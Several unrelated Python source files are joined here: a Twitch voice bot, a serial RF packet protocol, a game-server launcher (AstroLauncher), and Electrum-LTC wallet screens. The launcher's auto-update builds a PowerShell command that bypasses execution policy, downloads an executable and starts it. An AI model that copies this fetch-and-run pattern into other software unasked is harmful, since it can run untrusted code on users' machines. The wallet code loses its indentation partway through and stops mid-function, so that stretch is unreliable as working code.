        # Skip while a previous clip is still playing (lock file present).
        if os.path.isfile("./.lock"):
            return
        if message.content.startswith('@aki '):
            # Fix: the stripped text (mess) was computed but the raw
            # message.content was passed to launch_voice — pass mess instead.
            mess = message.content.replace('@aki ', '')
            print(f"Message received: {mess} from {message.author.name}")
            th = Thread(target=launch_voice, args=(mess, message.author.name))
        else:
            print(f"Message received: {message.content} from {message.author.name}")
            th = Thread(target=launch_voice, args=(message.content, message.author.name))
        th.start()
        #await self.handle_commands(message)
#create menu
def create_menu(options, width=30):
    """Return the options, each left-justified to *width* characters."""
    return [option.ljust(width) for option in options]
#show menu
def show_menu(menu):
    """Print the menu entries as numbered lines, starting at 1."""
    for number, entry in enumerate(menu, start=1):
        print(f"{number} - {entry}")
#get choice
def get_choice(menu):
    """Display *menu* and return the user's raw console input."""
    show_menu(menu)
    return input(">>> ")
#handle choice
def handle_choice(choice, menu, options):
    """Return the option selected by *choice*; re-prompt until it is valid."""
    is_valid = choice.isdigit() and 1 <= int(choice) <= len(options)
    if is_valid:
        return options[int(choice) - 1]
    print("Invalid choice!")
    return handle_choice(get_choice(menu), menu, options)
#main
def main():
    """Interactive entry point: pick an operating mode from a console menu."""
    # Remove the lock file if it exists
    if os.path.isfile("./.lock"):
        os.remove("./.lock")
    # Create a list of options
    options = ["QA Mode","Input Text","Get From Txt","Test Emotion" ,"Exit"]
    # Create a menu from the options list
    menu = create_menu(options)
    choice = handle_choice(get_choice(menu), menu, options)
    # Play the selected audio
    if choice == "QA Mode":
        # run as a Twitch chat bot (blocks in bot.run())
        bot = Bot()
        bot.run()
    elif choice == "Input Text":
        while True:
            text = input("Enter text: ")
            #break the loop when press crtl+x
            # (in practice the loop exits on empty input)
            if text == "":
                break
            else:
                launch_voice(text,"")
    elif choice == "Get From Txt":
        text = readFile("conversations/read/read.txt")
        launch_voice(text,"")
    elif choice == "Test Emotion":
        play(signals("positive"),1.5)
    # Exit the program
    elif choice == "Exit":
        exit()
#call main
if __name__ == "__main__":
    # Keep the menu alive across crashes. Fix: the original re-entered
    # main() inside the except handler and swallowed the error silently,
    # so a second consecutive failure escaped the while-True loop; now the
    # loop itself retries and the failure is logged.
    while True:
        try:
            main()
        except Exception:
            traceback.print_exc()
|
protocol.py | import serial
import threading
class ProtocolTest():
    """Minimal layered packet protocol over a serial RF link:
    link (layer1) -> network (layer2) -> transport (layer3)."""

    def __init__(self, dev_addr, rf_address=1, baudrate=115200):
        """Open the serial device and remember our own RF address."""
        self.rf = serial.Serial(dev_addr, baudrate)
        self.address = rf_address
        self.neighbors = []

    def layer3(self, data):
        """
        - actual payload
        """
        print('[transport layer] ', data)

    def layer2(self, data):
        """
        - check packet type
        """
        kind = data[:2].decode()
        src = data[2:6]
        dst = data[6:10]
        print('[network layer] ', 'packet type ', kind, ' from ', src, ' for ', dst)
        if kind == '00':
            # hello request: answer with a hello reply
            self.send('hello from', pkt_type='01')
        elif kind == '01':
            # hello reply: a neighbour announced itself
            print('new neighbour', src)
        else:
            # any other type carries payload for the transport layer
            self.layer3(data[10:])

    def layer1(self, data):
        """
        - remove total bytes
        - remove signal quality (if present)
        """
        size = data[0]
        print('[link layer] ', size, ' bytes')
        self.layer2(data[1:size + 1])

    def send(self, data, dest='0000', pkt_type='00'):
        """Frame *data* and transmit it through the radio's send() REPL command."""
        # TODO: find a better way of sending, AT commands maybe?
        print('sending', data, dest, pkt_type)
        frame = f'{pkt_type}{self.address}{dest}{data}'
        self.rf.write(bytes(f"send('{frame}')\r", 'utf8'))

    def recv(self):
        """Blocking read loop: feed every 'RCV'-prefixed line into layer1."""
        print('waiting data...')
        while True:
            line = self.rf.readline()
            if line[:3].decode() == 'RCV':
                self.layer1(line[3:])

    def listen(self):
        """Start recv() on a background thread and return that Thread."""
        print('listen serial port')
        worker = threading.Thread(target=self.recv)
        worker.start()
        return worker
AstroLauncher.py | import argparse
import asyncio
import atexit
import ctypes
import dataclasses
import os
import shutil
import subprocess
import sys
import time
from threading import Thread
import requests
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
import cogs.AstroAPI as AstroAPI
import cogs.AstroWebServer as AstroWebServer
import cogs.ValidateSettings as ValidateSettings
from cogs.AstroDaemon import AstroDaemon
from cogs.AstroDedicatedServer import AstroDedicatedServer
from cogs.AstroLogging import AstroLogging
from cogs.MultiConfig import MultiConfig
from cogs.AstroRCON import AstroRCON
"""
Build:
pyinstaller AstroLauncher.py -F --add-data "assets;./assets" --icon=assets/astrolauncherlogo.ico
or
python BuildEXE.py
"""
class AstroLauncher():
    """ Starts a new instance of the Server Launcher"""

    @dataclasses.dataclass
    class LauncherConfig():
        # User-tunable settings, persisted in the [AstroLauncher] section of Launcher.ini.
        DisableAutoUpdate: bool = False
        ServerStatusFrequency: float = 2
        PlayfabAPIFrequency: float = 2
        DisableBackupRetention: bool = False
        BackupRetentionPeriodHours: float = 76
        BackupRetentionFolderLocation: str = r"Astro\Saved\Backup\LauncherBackups"
        EnableAutoRestart: bool = False
        AutoRestartEveryHours: float = 24
        AutoRestartSyncTimestamp: str = "00:00"
        DisableNetworkCheck: bool = False
        DisableWebServer: bool = False
        WebServerPort: int = 5000
        DisableServerConsolePopup: bool = False

        def __post_init__(self):
            """Coerce each INI-sourced value to its declared field type; exit on bad config."""
            # pylint: disable=no-member
            hasError = False
            for field, data in self.__dataclass_fields__.items():
                try:
                    self.__dict__[field] = data.type(self.__dict__[field])
                except ValueError:
                    hasError = True
                    AstroLogging.logPrint(
                        f"INI error: {field} must be of type {data.type.__name__}", "critical")
            if hasError:
                AstroLogging.logPrint(
                    "Fix your launcher config file!", "critical")
                sys.exit()

    class SaveHandler(FileSystemEventHandler):
        """Watchdog handler that logs each completed server save."""

        def __init__(self, launcher):
            self.launcher = launcher
            self.astroPath = self.launcher.astroPath
            self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
            super().__init__()

        def on_modified(self, event):
            """Report the newest file in the save directory, then stop the observer."""
            time.sleep(1)  # give the server a moment to finish writing
            dirName = os.path.dirname(event.src_path)
            fileName = [f for f in os.listdir(
                dirName) if os.path.isfile(os.path.join(dirName, f))][0]
            AstroLogging.logPrint(f"Server saved. {fileName}")
            self.launcher.saveObserver.stop()

    class BackupHandler(FileSystemEventHandler):
        """Watchdog handler that copies fresh backups into the retention folder
        and prunes retained copies older than the retention period."""

        def __init__(self, launcher):
            self.launcher = launcher
            self.astroPath = self.launcher.astroPath
            self.moveToPath = self.launcher.launcherConfig.BackupRetentionFolderLocation
            self.retentionPeriodHours = self.launcher.launcherConfig.BackupRetentionPeriodHours
            super().__init__()

        def on_modified(self, event):
            # AstroLogging.logPrint("File in save directory changed")
            path = os.path.join(self.astroPath, self.moveToPath)
            try:
                if not os.path.exists(path):
                    os.makedirs(path)
            except Exception as e:
                AstroLogging.logPrint(e, "error")
            now = time.time()
            # prune retained backups older than the retention window
            try:
                for f in os.listdir(path):
                    fpath = os.path.join(path, f)
                    if os.stat(fpath).st_mtime < (now - (self.retentionPeriodHours * 60 * 60)):
                        os.remove(fpath)
            except Exception as e:
                AstroLogging.logPrint(e, "error")
            AstroLogging.logPrint("Copying backup to retention folder.")
            time.sleep(1)  # give the game a moment to finish writing the backup
            try:
                dirName = os.path.dirname(event.src_path)
                newFile = os.path.join(dirName, [f for f in os.listdir(
                    dirName) if os.path.isfile(os.path.join(dirName, f))][0])
                # AstroLogging.logPrint(newFile, "debug")
                shutil.copy2(newFile, path)
                # AstroLogging.logPrint(copiedFile, "debug")
            except FileNotFoundError as e:
                AstroLogging.logPrint(e, "error")
            except Exception as e:
                AstroLogging.logPrint(e, "error")
            self.launcher.backupObserver.stop()

    def __init__(self, astroPath, launcherINI="Launcher.ini", disable_auto_update=None):
        """Locate the server install, load config, start observers and the
        web server, then launch the dedicated server (blocking)."""
        # check if path specified
        if astroPath is not None:
            if os.path.exists(os.path.join(astroPath, "AstroServer.exe")):
                self.astroPath = astroPath
            else:
                print("Specified path does not contain the server executable")
                time.sleep(5)
        # check if executable in current directory
        elif os.path.exists(os.path.join(os.getcwd(), "AstroServer.exe")):
            self.astroPath = os.getcwd()
        # fallback to automatic detection (experimental, do NOT rely on it)
        else:
            try:
                autoPath = AstroAPI.getInstallPath()
                if os.path.exists(os.path.join(autoPath, "AstroServer.exe")):
                    self.astroPath = autoPath
            except:
                AstroLogging.logPrint(
                    "Unable to find AstroServer.exe!", "critical")
                return
        AstroLogging.setup_logging(self.astroPath)
        self.launcherINI = launcherINI
        self.launcherConfig = self.LauncherConfig()
        self.launcherPath = os.getcwd()
        self.refresh_launcher_config()
        if disable_auto_update is not None:
            self.launcherConfig.DisableAutoUpdate = disable_auto_update
        self.version = "v1.4.6"
        self.latestURL = "https://github.com/ricky-davis/AstroLauncher/releases/latest"
        # True when running as a bundled executable rather than a plain script
        self.isExecutable = os.path.samefile(sys.executable, sys.argv[0])
        self.headers = AstroAPI.base_headers
        self.DaemonProcess = None
        self.saveObserver = None
        self.backupObserver = None
        self.DSServerStats = None
        self.DedicatedServer = AstroDedicatedServer(
            self.astroPath, self)
        AstroLogging.logPrint(
            f"AstroLauncher - Unofficial Dedicated Server Launcher {self.version}")
        AstroLogging.logPrint(
            "If you encounter any bugs please open a new issue at:")
        AstroLogging.logPrint(
            "https://github.com/ricky-davis/AstroLauncher/issues")
        AstroLogging.logPrint(
            "To safely stop the launcher and server press CTRL+C")
        self.check_for_update()
        AstroLogging.logPrint("Starting a new session")
        if not self.launcherConfig.DisableNetworkCheck:
            AstroLogging.logPrint("Checking the network configuration..")
            self.check_network_config()
        self.headers['X-Authorization'] = AstroAPI.generate_XAUTH(
            self.DedicatedServer.settings.ServerGuid)
        self.save_reporting()
        if not self.launcherConfig.DisableBackupRetention:
            self.backup_retention()
            AstroLogging.logPrint("Backup retention started")
        # setup queue for data exchange
        if not self.launcherConfig.DisableWebServer:
            # start http server
            self.webServer = self.start_WebServer()
            AstroLogging.logPrint(
                f"HTTP Server started at 127.0.0.1:{self.launcherConfig.WebServerPort}")
        # make sure the game server is stopped cleanly when the launcher exits
        atexit.register(self.DedicatedServer.kill_server,
                        reason="Launcher shutting down",
                        save=True)
        self.start_server()

    def save_reporting(self):
        """(Re)start the observer that reports server saves; re-arms itself if dead."""
        if self.saveObserver:
            if not self.saveObserver.is_alive():
                self.saveObserver = None
                self.save_reporting()
        else:
            self.saveObserver = Observer()
            saveGamePath = r"Astro\Saved\SaveGames"
            watchPath = os.path.join(
                self.astroPath, saveGamePath)
            try:
                if not os.path.exists(watchPath):
                    os.makedirs(watchPath)
            except Exception as e:
                AstroLogging.logPrint(e)
            self.saveObserver.schedule(
                self.SaveHandler(self), watchPath)
            self.saveObserver.start()

    def backup_retention(self):
        """(Re)start the observer that mirrors backups into the retention folder."""
        if self.backupObserver:
            if not self.backupObserver.is_alive():
                self.backupObserver = None
                self.backup_retention()
        else:
            self.backupObserver = Observer()
            backupSaveGamePath = r"Astro\Saved\Backup\SaveGames"
            watchPath = os.path.join(
                self.astroPath, backupSaveGamePath)
            try:
                if not os.path.exists(watchPath):
                    os.makedirs(watchPath)
            except Exception as e:
                AstroLogging.logPrint(e)
            self.backupObserver.daemon = True
            self.backupObserver.schedule(
                self.BackupHandler(self), watchPath)
            self.backupObserver.start()

    def refresh_launcher_config(self):
        """Merge Launcher.ini over the dataclass defaults and write the result back."""
        field_names = set(
            f.name for f in dataclasses.fields(self.LauncherConfig))
        # drop unknown keys so dataclasses.replace() does not raise
        cleaned_config = {k: v for k,
                          v in self.get_launcher_config().items() if k in field_names}
        self.launcherConfig = dataclasses.replace(
            self.launcherConfig, **cleaned_config)
        config = MultiConfig()
        config.read_dict({"AstroLauncher": cleaned_config})
        with open(self.launcherINI, 'w') as configfile:
            config.write(configfile)

    def get_launcher_config(self):
        """Return the [AstroLauncher] INI section, seeded with dataclass defaults."""
        baseConfig = {
            "AstroLauncher": dataclasses.asdict(self.LauncherConfig())
        }
        config = MultiConfig().baseline(self.launcherINI, baseConfig)
        # print(settings)
        settings = config.getdict()['AstroLauncher']
        return settings

    def check_for_update(self):
        """Compare the running version against the latest GitHub release;
        trigger autoupdate when allowed. Network errors are ignored."""
        try:
            url = "https://api.github.com/repos/ricky-davis/AstroLauncher/releases/latest"
            data = ((requests.get(url)).json())
            latestVersion = data['tag_name']
            if latestVersion != self.version:
                AstroLogging.logPrint(
                    f"UPDATE: There is a newer version of the launcher out! {latestVersion}")
                AstroLogging.logPrint(f"Download it at {self.latestURL}")
                if self.isExecutable and not self.launcherConfig.DisableAutoUpdate:
                    self.autoupdate(data)
        except:
            pass

    def autoupdate(self, data):
        """Spawn a detached PowerShell that waits for this process to exit,
        downloads the release asset, swaps the exe, and restarts it."""
        x = data
        downloadFolder = os.path.dirname(sys.executable)
        for fileObj in x['assets']:
            downloadURL = fileObj['browser_download_url']
            fileName = (os.path.splitext(fileObj['name'])[0])
            downloadPath = os.path.join(downloadFolder, fileName)
            downloadCMD = ["powershell", '-executionpolicy', 'bypass', '-command',
                           'Write-Host "Starting download of latest AstroLauncher.exe..";', 'wait-process', str(
                               os.getpid()), ';',
                           '[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;',
                           'Invoke-WebRequest', f"'{downloadURL}'", "-OutFile", f"'{downloadPath + '_new.exe'}'", ';',
                           "Move-Item", "-path", f"'{downloadPath + '_new.exe'}'", "-destination", f"'{downloadPath + '.exe'}'", "-Force;",
                           'Start-Process', f"'{downloadPath + '.exe'}' --noupdate"]
            # print(' '.join(downloadCMD))
            subprocess.Popen(downloadCMD, shell=True,
                             creationflags=subprocess.DETACHED_PROCESS)
        time.sleep(2)
        self.DedicatedServer.kill_server("Auto-Update")

    def start_server(self):
        """
        Starts the Dedicated Server process and waits for it to be registered
        """
        self.DedicatedServer.status = "starting"
        self.DedicatedServer.busy = False
        self.DSServerStats = None
        oldLobbyIDs = self.DedicatedServer.deregister_all_server()
        AstroLogging.logPrint("Starting Server process...")
        if self.launcherConfig.EnableAutoRestart:
            AstroLogging.logPrint(
                f"Next restart is at {self.DedicatedServer.nextRestartTime}")
        time.sleep(5)
        startTime = time.time()
        self.DedicatedServer.start()
        self.DaemonProcess = AstroDaemon.launch(
            executable=self.isExecutable, consolePID=self.DedicatedServer.process.pid)
        # Wait for server to finish registering...
        while not self.DedicatedServer.registered:
            try:
                # fetch the server build version once via RCON
                if self.DSServerStats is None:
                    try:
                        tempStats = AstroRCON.DSServerStatistics(
                            self.DedicatedServer.settings.ConsolePort)
                        if tempStats is not None:
                            self.DSServerStats = tempStats
                            AstroLogging.logPrint(
                                f"Server version: v{tempStats['build']}")
                    except:
                        pass
                serverData = (AstroAPI.get_server(
                    self.DedicatedServer.ipPortCombo, self.headers))
                serverData = serverData['data']['Games']
                lobbyIDs = [x['LobbyID'] for x in serverData]
                # a brand-new LobbyID appearing means registration succeeded
                if len(set(lobbyIDs) - set(oldLobbyIDs)) == 0:
                    time.sleep(self.launcherConfig.PlayfabAPIFrequency)
                else:
                    now = time.time()
                    if now - startTime > 15:
                        self.DedicatedServer.registered = True
                        del oldLobbyIDs
                        self.DedicatedServer.LobbyID = serverData[0]['LobbyID']
                if self.DedicatedServer.process.poll() is not None:
                    AstroLogging.logPrint(
                        "Server was forcefully closed before registration. Exiting....")
                    return False
            except KeyboardInterrupt:
                self.DedicatedServer.kill_server("Launcher shutting down")
            except:
                # likely PlayFab rate limiting; back off by growing the poll interval
                AstroLogging.logPrint(
                    "Failed to check server. Probably hit rate limit. Backing off and trying again...")
                self.launcherConfig.PlayfabAPIFrequency += 1
                time.sleep(self.launcherConfig.PlayfabAPIFrequency)
        doneTime = time.time()
        elapsed = doneTime - startTime
        AstroLogging.logPrint(
            f"Server ready with ID {self.DedicatedServer.LobbyID}. Took {round(elapsed,2)} seconds to register.")
        self.DedicatedServer.status = "ready"
        self.DedicatedServer.server_loop()

    def check_network_config(self):
        """Verify the game port is reachable and warn if the RCON port is exposed."""
        networkCorrect = ValidateSettings.test_network(
            self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.Port), False)
        if networkCorrect:
            AstroLogging.logPrint("Server network configuration good!")
        else:
            AstroLogging.logPrint(
                "I can't seem to validate your network settings..", "warning")
            AstroLogging.logPrint(
                f"Make sure to Port Forward ({self.DedicatedServer.settings.Port} UDP) and enable NAT Loopback", "warning")
            AstroLogging.logPrint(
                "If nobody can connect, Port Forward.", "warning")
            AstroLogging.logPrint(
                "If others are able to connect, but you aren't, enable NAT Loopback.", "warning")
        # a reachable console port is a security hole, so "correct" means unreachable
        rconNetworkCorrect = not (ValidateSettings.test_network(
            self.DedicatedServer.settings.PublicIP, int(self.DedicatedServer.settings.ConsolePort), True))
        if rconNetworkCorrect:
            AstroLogging.logPrint("Remote Console network configuration good!")
        else:
            AstroLogging.logPrint(
                f"SECURITY ALERT: Your console port ({self.DedicatedServer.settings.ConsolePort}) is Port Forwarded!", "warning")
            AstroLogging.logPrint(
                "SECURITY ALERT: This allows anybody to control your server.", "warning")
            AstroLogging.logPrint(
                "SECURITY ALERT: Disable this ASAP to prevent issues.", "warning")
            time.sleep(5)

    def start_WebServer(self):
        """Run the status web server on a daemon thread; return the server object."""
        ws = AstroWebServer.WebServer(self)

        def start_server():
            # Windows Python >= 3.8 defaults to the Proactor event loop;
            # the selector policy is set here — presumably required by the
            # web server implementation (confirm against AstroWebServer).
            if sys.version_info.minor > 7:
                asyncio.set_event_loop_policy(
                    asyncio.WindowsSelectorEventLoopPolicy())
            asyncio.set_event_loop(asyncio.new_event_loop())
            ws.run()
        t = Thread(target=start_server, args=())
        t.daemon = True
        t.start()
        return ws
if __name__ == "__main__":
    try:
        # Set the console window title (Windows `title` command)
        os.system("title AstroLauncher - Unofficial Dedicated Server Launcher")
    except:
        pass
    try:
        parser = argparse.ArgumentParser()
        parser.add_argument(
            "-p", "--path", help="Set the server folder path", type=str.lower)
        parser.add_argument("-d", "--daemon", dest="daemon",
                            help="Set the launcher to run as a Daemon", action='store_true')
        parser.add_argument("-U", "--noupdate", dest="noautoupdate", default=None,
                            help="Disable autoupdate if running as exe", action='store_true')
        parser.add_argument(
            "-c", "--consolepid", help="Set the consolePID for the Daemon", type=str.lower)
        parser.add_argument(
            "-l", "--launcherpid", help="Set the launcherPID for the Daemon", type=str.lower)
        args = parser.parse_args()
        if args.daemon:
            if args.consolepid and args.launcherpid:
                # Hide this console window via the Win32 API before daemonizing
                kernel32 = ctypes.WinDLL('kernel32')
                user32 = ctypes.WinDLL('user32')
                SW_HIDE = 0
                hWnd = kernel32.GetConsoleWindow()
                if hWnd:
                    user32.ShowWindow(hWnd, SW_HIDE)
                AstroDaemon().daemon(args.launcherpid, args.consolepid)
            else:
                print("Insufficient launch options!")
        else:
            # normal (non-daemon) launch; blocks inside AstroLauncher.__init__
            AstroLauncher(args.path, disable_auto_update=args.noautoupdate)
    except KeyboardInterrupt:
        pass
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from electrum_ltc.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum_ltc.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum_ltc import bitcoin, constants
from electrum_ltc.transaction import Transaction, tx_from_any, PartialTransaction, PartialTxOutput
from electrum_ltc.util import parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice
from electrum_ltc.wallet import InternalAddressCorruption
from electrum_ltc import simple_config
from electrum_ltc.lnaddr import lndecode
from electrum_ltc.lnutil import RECEIVED, SENT, PaymentFailure
from electrum_ltc.logging import Logger
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum_ltc.gui.kivy import KIVY_GUI_PATH
from electrum_ltc.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum_ltc.gui.kivy.main_window import ElectrumWindow
from electrum_ltc.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
    # marker subclass; rules/styling presumably come from the kv files loaded below
    pass
class RequestRecycleView(RecycleView):
    # marker subclass; rules/styling presumably come from the kv files loaded below
    pass
class PaymentRecycleView(RecycleView):
    # marker subclass; rules/styling presumably come from the kv files loaded below
    pass
class CScreen(Factory.Screen):
    """Base class for the wallet's main screens; adds on_activate/on_deactivate
    events on top of Kivy's Screen enter/leave events."""
    __events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
    action_view = ObjectProperty(None)
    kvname = None  # set by subclasses; used to register the screen on the app
    app = App.get_running_app()  # type: ElectrumWindow

    def on_enter(self):
        # FIXME: use a proper event don't use animation time of screen
        Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
        pass

    def update(self):
        # overridden by subclasses to refresh their displayed data
        pass

    def on_activate(self):
        """Register this screen on the app (e.g. app.history_screen) and refresh it."""
        setattr(self.app, self.kvname + '_screen', self)
        self.update()

    def on_leave(self):
        self.dispatch('on_deactivate')

    def on_deactivate(self):
        pass
# note: this list needs to be kept in sync with another in qt
# Indexed by the integer status returned by wallet.get_tx_status
# (see HistoryScreen.get_card below).
TX_ICONS = [
    "unconfirmed",
    "close",
    "unconfirmed",
    "close",
    "clock1",
    "clock2",
    "clock3",
    "clock4",
    "clock5",
    "confirmed",
]
# Load the kv layout rules for the three main screens.
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
    """Screen listing the wallet's on-chain and lightning transaction history."""
    tab = ObjectProperty(None)
    kvname = 'history'
    cards = {}

    def __init__(self, **kwargs):
        self.ra_dialog = None
        super(HistoryScreen, self).__init__(**kwargs)

    def show_item(self, obj):
        """Open the appropriate detail dialog for a tapped history row."""
        key = obj.key
        tx_item = self.history.get(key)
        if tx_item.get('lightning') and tx_item['type'] == 'payment':
            self.app.lightning_tx_dialog(tx_item)
            return
        if tx_item.get('lightning'):
            # lightning-related but on-chain: fetch the tx from the watcher's db
            tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
        else:
            tx = self.app.wallet.db.get_transaction(key)
        if not tx:
            return
        self.app.tx_dialog(tx)

    def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
        """Build the dict consumed by the history RecycleView for one entry."""
        is_lightning = tx_item.get('lightning', False)
        timestamp = tx_item['timestamp']
        # lightning payments are keyed by payment_hash, on-chain txs by txid
        key = tx_item.get('txid') or tx_item['payment_hash']
        if is_lightning:
            status = 0
            status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
            icon = f'atlas://{KIVY_GUI_PATH}/theming/light/lightning'
            message = tx_item['label']
            fee_msat = tx_item['fee_msat']
            fee = int(fee_msat/1000) if fee_msat else None
            fee_text = '' if fee is None else 'fee: %d sat'%fee
        else:
            tx_hash = tx_item['txid']
            conf = tx_item['confirmations']
            tx_mined_info = TxMinedInfo(height=tx_item['height'],
                                        conf=tx_item['confirmations'],
                                        timestamp=tx_item['timestamp'])
            status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
            # status indexes into TX_ICONS (module-level list above)
            icon = f'atlas://{KIVY_GUI_PATH}/theming/light/' + TX_ICONS[status]
            message = tx_item['label'] or tx_hash
            fee = tx_item['fee_sat']
            fee_text = '' if fee is None else 'fee: %d sat'%fee
        ri = {}
        ri['screen'] = self
        ri['key'] = key
        ri['icon'] = icon
        ri['date'] = status_str
        ri['message'] = message
        ri['fee_text'] = fee_text
        value = tx_item['value'].value
        if value is not None:
            ri['is_mine'] = value <= 0
            ri['amount'] = self.app.format_amount(value, is_diff = True)
            if 'fiat_value' in tx_item:
                ri['quote_text'] = str(tx_item['fiat_value'])
        return ri

    def update(self, see_all=False):
        """Rebuild the RecycleView data from the wallet's full history (newest first)."""
        wallet = self.app.wallet
        if wallet is None:
            return
        self.history = wallet.get_full_history(self.app.fx)
        history = reversed(self.history.values())
        history_card = self.ids.history_container
        history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
if not self.app.wallet:
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_invoice_status(invoice)
status_str = invoice.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice):
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
if is_lightning:
assert isinstance(item, LNInvoice)
key = item.rhash
address = key
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
key = item.id
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Litecoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Litecoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
    def save_invoice(self, invoice):
        # Persist the invoice in the wallet, then reset and redraw the form.
        self.app.wallet.save_invoice(invoice)
        self.do_clear()
        self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
    def do_pay_invoice(self, invoice):
        # Dispatch to the lightning or on-chain payment flow.
        if invoice.is_lightning():
            if self.app.wallet.lnworker:
                # password-protected confirmation; _do_pay_lightning runs after auth
                self.app.protected(_('Pay lightning invoice?'), self._do_pay_lightning, (invoice,))
            else:
                self.app.show_error(_("Lightning payments are not available for this wallet"))
        else:
            self._do_pay_onchain(invoice)
    def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
        # pw is supplied by app.protected but is not used here.
        def pay_thread():
            try:
                self.app.wallet.lnworker.pay(invoice.invoice, attempts=10)
            except Exception as e:
                self.app.show_error(repr(e))
        self.save_invoice(invoice)
        # pay in a background thread so the UI stays responsive
        threading.Thread(target=pay_thread).start()
    def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
